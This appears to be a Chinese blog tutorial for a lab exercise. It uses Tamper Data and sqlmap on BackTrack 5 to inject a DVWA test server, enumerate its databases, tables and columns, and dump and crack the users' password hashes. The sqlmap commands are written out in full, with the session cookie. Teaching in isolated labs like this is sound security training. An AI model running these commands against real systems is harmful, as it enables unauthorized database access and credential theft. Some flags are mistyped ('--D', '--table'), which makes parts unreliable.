Bt5的sqlmap使用

版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!


恰饭广告




实验之前请先阅读这篇文章:https://www.idaobin.com/explain

任务描述:
学习Sqlmap(命令行自动SQL注入工具)的使用实现代码清单4-12的效果P160

任务环境说明:

攻击机:BT5
靶机:Web 服务器靶机
攻击机安装服务/工具2:Tamper Data插件
攻击机安装服务/工具3:sqlmap
攻击机安装服务/工具4:

实现步骤:

1.    火狐浏览器安装Tamper Data插件
bt5r3上自带着Tamper Data只是没有启用,启用插件即可

打开火狐浏览器

选择Enable,允许启用插件

启用插件

允许启用之后,还需重新加载插件

重新启动插件

2.    使用Tamper Data 获取Cookie信息
在Tamper Data的web界面下获取Cookie信息
web界面下启动Tamper Data

启动Tamper Data

点击start Tamper,开始探测浏览器打开的每一个链接的cookie信息

Tamper界面

然后返回浏览器,地址栏输入目标地址为http://10.10.10.129/dvwa/login.php
回车以后弹出一个警告框,选择Tamper

开始获取dvwacookie信息

点击Tamper以后,点击OK

显示dvwa的cookie信息

显示dvwa的cookie信息

这里获取到目标页面的cookie安全等级比较高,需要登录dvwa应用把安全等级调低为low,账号密码都为admin
登录dvwa后台以后,设置安全等级为low并提交
dvwa后台设置

dvwa后台设置

dvwa后台设置

设置安全等级以后,进入SQL Injection页面查看是否有SQL注入漏洞

sql漏洞注入

在User ID输入框中输入任意值并提交

输入a值

输入a值之后

得到目标页面为http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#

运用以上方法获得了目标页面(http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#)的cookie值,并把它全部内容复制下来

复制cookie信息

3.    通过sqlmap进行注入攻击
bt5默认没有sqlmap命令,只能通过脚本来运行

cd /pentest/database/sqlmap
python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124'

sqlmap示例
参数:
-u 指定目标页面的URL链接
–cookie 指定目标页面的安全等级和PHPSESSID
注意:命令不能复制,参数值使用实验获取到了web服务器的操作系统版本以及PHP、Apache、MySQL的版本信息
结果:实验获取到了web服务器的操作系统版本以及PHP、Apache、MySQL的版本信息

通过sqlmap获取数据库名

python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --dbs -v 0

sqlmap获取数据库名

参数:
-dbs 列出所有数据库
-v 设置详细级别 (级别为0-6,默认为1)
0 只显示Python的回溯,错误和关键消息
1 显示信息和警告消息
2 显示调试消息
3 显示有效载荷注入
4 显示HTTP请求
5 显示HTTP响应头
6 显示HTTP响应页面的内容
结果:实验获取到了web应用的数据库名称为dvwa,information_schema为系统数据库MySQL自带的

通过sqlmap获取表名

python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table

sqlmap获取表名
参数:
-D 指定数据库名
–tables 列出指定数据库中的表
结果:实验获取到dvwa数据库存在两个表,分别为guestbook和users
通过sqlmap获取列名

python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table -T users --columns

sqlmap获取列名

参数:
-T 指定表名
— columns 列出字段
结果:实验获取到了数据库中表名为users存在6个字段
通过sqlmap导出password列的内容

python sqlmap.py -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit#' --cookie='security=low;PHPSESSID=gb3klnkpq9tanl6f4puuobe124' --D dvwa --table -T users --columns --dump

sqlmap导出password列的内容

参数:
–dump 列出指定数据库的表的字段的数据
注意:sqlmap会询问3次,第一次询问是否要求破解密码(y确定/n否/q退出),第二次要求调用密码字典(直接按回车默认即可),第三次询问要求是否普通的密码后缀(y/确定/n否)
获取结果如下

sqlmap获取用户和密码
实验获取到了web应用后台数据库的所有用户账户和哈希值,并将数据保存为CSV表格文件

实验获取到了管理员的账号和密码都为admin

原文链接:https://www.idaobin.com/archives/669.html

让我恰个饭吧.ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信
图片加载中图片加载中



恰饭广告

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

90 ÷ = 9